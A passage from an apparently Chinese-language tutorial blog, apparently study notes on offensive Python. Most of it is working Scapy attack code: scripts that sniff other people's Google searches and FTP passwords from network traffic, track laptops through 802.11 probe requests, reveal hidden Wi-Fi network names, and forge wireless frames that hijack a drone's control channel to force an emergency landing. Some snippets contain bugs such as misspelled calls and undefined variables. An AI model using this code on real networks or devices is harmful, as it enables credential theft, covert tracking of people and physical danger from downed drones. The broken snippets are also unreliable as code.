    </tr>
    <tr>
      <td>pq=</td>
      <td>上一次查询的内容，即本次搜索前一次的查询内容</td>
    </tr>
    <tr>
      <td>hl=</td>
      <td>语言，默认是 en，可以试试 <code class="language-plaintext highlighter-rouge">xx-hacker</code></td>
    </tr>
    <tr>
      <td>as_epq=</td>
      <td>查询的精度</td>
    </tr>
    <tr>
      <td>as_filetype=</td>
      <td>文件格式，用于搜索特定类型的文件，比如 <code class="language-plaintext highlighter-rouge">.zip</code></td>
    </tr>
    <tr>
      <td>as_sitesearch=</td>
      <td>指定要搜索的网站</td>
    </tr>
  </tbody>
</table>

<p>可以把抓取到的搜索数据实时显示出来</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_google</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Raw</span><span class="p">):</span>
        <span class="n">payload</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Raw</span><span class="p">).</span><span class="n">load</span>
        <span class="k">if</span> <span class="s">"GET"</span> <span class="ow">in</span> <span class="n">payload</span><span class="p">:</span>
            <span class="k">if</span> <span class="s">"google"</span> <span class="ow">in</span> <span class="n">payload</span><span class="p">:</span>
                <span class="n">r</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"(?i)\&amp;q=(.*?)\&amp;"</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
                <span class="k">if</span> <span class="n">r</span><span class="p">:</span>
                    <span class="n">search</span> <span class="o">=</span> <span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"&amp;"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
                    <span class="n">search</span> <span class="o">=</span> <span class="n">search</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"q="</span><span class="p">,</span> <span class="s">""</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">"+"</span><span class="p">,</span> <span class="s">" "</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">"%20"</span><span class="p">,</span> <span class="s">" "</span><span class="p">)</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Searched For: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">search</span><span class="p">))</span>
</code></pre></div></div>

<p>通过 <code class="language-plaintext highlighter-rouge">sniff</code> 进行嗅探：<code class="language-plaintext highlighter-rouge">sniff(filter="tcp port 80", prn=find_google)</code></p>

<h3 id="嗅探-ftp-登陆口令">嗅探 FTP 登陆口令</h3>

<p>文件传输协议（FTP）中没有使用加密措施来保护用户的登录密码，通过正则寻找这一信息，同时也会把数据包中的目的 IP 地址提取出来</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">ftp_sniff</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">dest</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">dst</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)USER (.*)"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">pswd</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)PASS (.*)"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">user</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] Detected FTP Login to {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">dest</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] User account: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">elif</span> <span class="n">pswd</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Password: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">pswd</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div></div>

<p>通过 <code class="language-plaintext highlighter-rouge">sniff(filter="tcp port 21", prn=ftp_sniff)</code> 实现</p>

<h2 id="你带着笔记本电脑去过哪里python-告诉你">你带着笔记本电脑去过哪里？Python 告诉你</h2>

<h3 id="侦听-80211-probe-请求">侦听 802.11 Probe 请求</h3>

<p>为了提供一个无缝连接，你的电脑和手机里经常会有一个首选网络列表，其中含有你曾经成功连接过的网络名字。在你电脑启动后或者从某个网络断线掉下来的时候，电脑会发送 802.11 Probe 请求来搜索列表中的各个网络。</p>

<p>写一个工具来发现 802.11 Probe 请求</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">interface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">probe_reqs</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">sniff_probe</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11ProbeReq</span><span class="p">):</span>
        <span class="n">net_name</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11ProbeReq</span><span class="p">).</span><span class="n">info</span>
        <span class="k">if</span> <span class="n">net_name</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">probe_reqs</span><span class="p">:</span>
            <span class="n">probe_reqs</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">net_name</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected New Probe Request: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">net_name</span><span class="p">))</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="n">interface</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">sniff_probe</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="寻找隐藏的-80211-信标">寻找隐藏的 802.11 信标</h3>

<p>尽管大部分网络都会公开显示他们的网络名（BSSID），但有的无线网络会使用一个隐藏的 SSID 来保护它的网络名不被发现。802.11 信标帧中的 info 字段一般都包含网络名。在隐藏的网络中，Wi-Fi 热点不会去填写这个字段，搜寻隐藏的网络其实很简单，因为只要去找 info 字段被留白的 802.11 信标帧就可以。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">sniff_dot11</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">).</span><span class="n">info</span> <span class="o">==</span> <span class="s">""</span><span class="p">:</span>
            <span class="n">addr2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
            <span class="k">if</span> <span class="n">addr2</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">hidden_nets</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[-] Detected Hidden SSID: with MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">addr2</span><span class="p">))</span>
</code></pre></div></div>

<h3 id="找出隐藏的-80211-网络的网络名">找出隐藏的 802.11 网络的网络名</h3>

<p>尽管热点没有填写 802.11 信标帧中的 info 字段，但它在 Probe 响应帧中还是要将网络名传输出来。因此必须等待那个与 802.11 信标帧的 Mac 地址匹配的 Probe 响应帧出现。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">interface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">hidden_nets</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">unhidden_nets</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">sniff_dot11</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11ProbeResp</span><span class="p">):</span>
        <span class="n">addr2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
        <span class="k">if</span> <span class="n">addr2</span> <span class="ow">in</span> <span class="n">hidden_nets</span> <span class="ow">and</span> <span class="n">addr2</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">unhidden_nets</span><span class="p">:</span>
            <span class="n">net_name</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11ProbeResp</span><span class="p">).</span><span class="n">info</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Decloaked Hidden SSID: {} for MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">net_name</span><span class="p">,</span> <span class="n">addr2</span><span class="p">))</span>
            <span class="n">unhidden_nets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr2</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">).</span><span class="n">info</span> <span class="o">==</span> <span class="s">""</span><span class="p">:</span>
            <span class="n">addr2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
            <span class="k">if</span> <span class="n">addr2</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">hidden_nets</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[-] Detected Hidden SSID: with MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">addr2</span><span class="p">))</span>
                <span class="n">hidden_nets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr2</span><span class="p">)</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="n">interface</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">sniff_dot11</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="用-python-截取和监视无人机">用 Python 截取和监视无人机</h2>

<h3 id="截取数据包解析协议">截取数据包，解析协议</h3>

<p>无人机和 iPhone 之间建立一个 <code class="language-plaintext highlighter-rouge">ad-hoc</code> 无线网络（点对点，ad-hoc 模式就和以前的直连双绞线概念一样，是 P2P 的连接，所以也就无法与其他网络进行沟通），MAC 地址绑定被证明是保护连接的唯一安全机制。只有配对成功的 iPhone 才能给无人机发送飞行控制指令。</p>

<p>首先，要将适配器调至混杂模式来监听流量。无人机发起了一个 UDP 流量，其目标地址是手机上的 UDP 5555 端口，发送的是视频信息，而飞行控制指令是通过 5556 端口实现的。</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># airmon-ng start wlan0</span>
<span class="c"># tcpdump-nn-i mon0</span>
</code></pre></div></div>

<p>知道了 iPhone 是通过 UDP 5556 端口向无人机发送飞行控制指令之后，可以编写一个 Python 脚本来把飞行控制流量解析出来</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">NAVPORT</span> <span class="o">=</span> <span class="mi">5556</span>
<span class="k">def</span> <span class="nf">print_pkt</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">)</span> <span class="ow">and</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">).</span><span class="n">dport</span> <span class="o">==</span> <span class="n">NAVPORT</span><span class="p">:</span>
        <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">raw</span><span class="p">)</span>
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sinff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">print_pkt</span><span class="p">)</span>
</code></pre></div></div>

<p>通过分析，协议使用的语法是 <code class="language-plaintext highlighter-rouge">AT*CMD=SEQUENCE_NUMBER,VALUE,[VALUE{3}]</code> 语句。</p>

<p>接下来写一个 <code class="language-plaintext highlighter-rouge">interceptThread</code> 类，其中存储了攻击所得的信息，包括当前抓取到的数据包、每条无人机协议的顺序号，以及一个描述无人机流量是否已经被拦截的布尔量。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">class</span> <span class="nc">interceptThread</span><span class="p">(</span><span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">found_uav</span> <span class="o">=</span> <span class="bp">False</span>
   <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
		<span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="bp">self</span><span class="p">.</span><span class="n">intercept_pkt</span><span class="p">,</span> <span class="nb">filter</span><span class="o">=</span><span class="s">"udp port 5556"</span><span class="p">)</span>
   <span class="k">def</span> <span class="nf">intercept_pkt</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">pkt</span><span class="p">):</span>
		<span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">found_uav</span> <span class="o">==</span> <span class="bp">False</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] UAV Found."</span><span class="p">)</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">found_uav</span> <span class="o">=</span> <span class="bp">True</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span> <span class="o">=</span> <span class="n">pkt</span>
        <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">raw</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">","</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="o">+</span> <span class="mi">5</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span>
</code></pre></div></div>

<h3 id="用-scapy-制作-80211-数据帧">用 Scapy 制作 802.11 数据帧</h3>

<p>接下来，要伪造一个包含无人机命令的数据包。要从当前的数据包或者帧中复制出必要的信息。这个数据包穿越了 RadioTap、802.11、SNAP、LLC、IP 和 UDP 层。</p>

<p>编写一个完整的库来复制各个层中的信息。注意，每个层中都要忽略掉一些字段，比如不复制表示 IP 包包长的字段，这个可以让 Scapy 自动把这个字段的值计算出来。同样，也不会记录那些存储校验和的字段。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">dup_radio</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">r_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">RadioTap</span><span class="p">)</span>
    <span class="n">version</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">version</span>
    <span class="n">pad</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">pad</span>
    <span class="n">present</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">present</span>
    <span class="n">notdecoded</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">notdecoded</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">RadioTap</span><span class="p">(</span><span class="n">version</span><span class="o">=</span><span class="n">version</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">present</span><span class="o">=</span><span class="n">present</span><span class="p">,</span> <span class="n">notdecoded</span><span class="o">=</span><span class="n">notdecoded</span><span class="p">)</span>
	<span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_dot11</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">subtype</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">subtype</span>
    <span class="n">copy_type</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="nb">type</span>
    <span class="n">proto</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">proto</span>
    <span class="n">fc_field</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">FCfield</span>
    <span class="n">copy_id</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">ID</span>
    <span class="n">addr1</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr1</span>
    <span class="n">addr2</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr2</span>
    <span class="n">addr3</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr3</span>
    <span class="n">sc</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">SC</span>
    <span class="n">addr4</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr4</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">Dot11</span><span class="p">(</span><span class="n">subtype</span><span class="o">=</span><span class="n">subtype</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">copy_type</span><span class="p">,</span> <span class="n">proto</span><span class="o">=</span><span class="n">proto</span><span class="p">,</span> <span class="n">fc_field</span><span class="o">=</span><span class="p">...)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_snap</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">s_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">SNAP</span><span class="p">)</span>
    <span class="n">oui</span> <span class="o">=</span> <span class="n">s_pkt</span><span class="p">.</span><span class="n">OUI</span>
    <span class="n">code</span> <span class="o">=</span> <span class="n">s_pkt</span><span class="p">.</span><span class="n">code</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">SNAP</span><span class="p">(</span><span class="n">OUI</span><span class="o">=</span><span class="n">oui</span><span class="p">,</span> <span class="n">code</span><span class="o">=</span><span class="n">code</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_llc</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
	<span class="n">l_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">LLC</span><span class="p">)</span>
    <span class="n">dsap</span> <span class="o">=</span> <span class="n">l_pkt</span><span class="p">.</span><span class="n">dsap</span>
    <span class="n">ssap</span> <span class="o">=</span> <span class="n">l_pkt</span><span class="p">.</span><span class="n">ssap</span>
    <span class="n">ctrl</span> <span class="o">=</span> <span class="n">l_pkt</span><span class="p">.</span><span class="n">ctrl</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">LLC</span><span class="p">(</span><span class="n">dsap</span><span class="o">=</span><span class="n">dsap</span><span class="p">,</span> <span class="n">ssap</span><span class="o">=</span><span class="n">ssap</span><span class="p">,</span> <span class="n">ctrl</span><span class="o">=</span><span class="n">ctrl</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_ip</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">i_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">)</span>
    <span class="n">version</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">version</span>
    <span class="n">tos</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">tos</span>
    <span class="n">copy_id</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="nb">id</span>
    <span class="n">flags</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">flags</span>
    <span class="n">ttl</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">ttl</span>
    <span class="n">proto</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">proto</span>
    <span class="n">src</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">src</span>
    <span class="n">dst</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">dst</span>
    <span class="n">options</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">options</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">version</span><span class="o">=</span><span class="n">version</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="n">copy_id</span><span class="p">,</span> <span class="p">...)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_udp</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">u_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">)</span>
    <span class="n">sport</span> <span class="o">=</span> <span class="n">u_pkt</span><span class="p">.</span><span class="n">sport</span>
    <span class="n">dport</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">dport</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">UDP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="n">sport</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="n">dport</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>
</code></pre></div></div>

<p>接下来拼凑在一起：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">inject_cmd</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">radio</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_radio</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">dot11</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_dot11</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">snap</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_snap</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">llc</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_llc</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">ip</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_ip</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">udp</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_udp</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">inject_pkt</span> <span class="o">=</span> <span class="n">radio</span> <span class="o">/</span> <span class="n">dot11</span> <span class="o">/</span> <span class="n">llc</span> <span class="o">/</span> <span class="n">snap</span> <span class="o">/</span> <span class="n">ip</span> <span class="o">/</span> <span class="n">udp</span> <span class="o">/</span> <span class="n">raw</span>
    <span class="n">sendp</span><span class="p">(</span><span class="n">inject_pkt</span><span class="p">)</span>
</code></pre></div></div>

<p>紧急迫降的指定对控制无人机来说是一条非常重要的指令。这个指令可以迫使无人机关闭引擎，并立即迫降下来。为了发出这条指令，可以使用序列号是当前的序列号再加上 100。接下来要发出指令 <code class="language-plaintext highlighter-rouge">AT*COMWDG=$SEQ\r</code>。这条指令的作用是把通信中的计数器重置成我们新设置的顺序值。之后无人机将会忽略之前的或者顺序号不匹配的指令。最后，再发送紧急迫降指令</p>

<h3 id="完成攻击使无人机紧急迫降">完成攻击，使无人机紧急迫降</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">emergency_land</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="n">spoof_seq</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">+</span> <span class="mi">100</span>
    <span class="n">watch</span> <span class="o">=</span> <span class="s">"AT*COMWDG={}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span><span class="p">)</span>
    <span class="n">to_cmd</span> <span class="o">=</span> <span class="s">"AT*REF={},{}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">EMER</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">watch</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">to_cmd</span><span class="p">)</span>
    
<span class="k">def</span> <span class="nf">take_off</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="n">spoof_seq</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">+</span> <span class="mi">100</span>
    <span class="n">watch</span> <span class="o">=</span> <span class="s">"AT*COMWDG={}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span><span class="p">)</span>
    <span class="n">to_cmd</span> <span class="o">=</span> <span class="s">"AT*REF={},{}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">TAKEOFF</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">watch</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">to_cmd</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="探测火绵羊">探测火绵羊</h2>

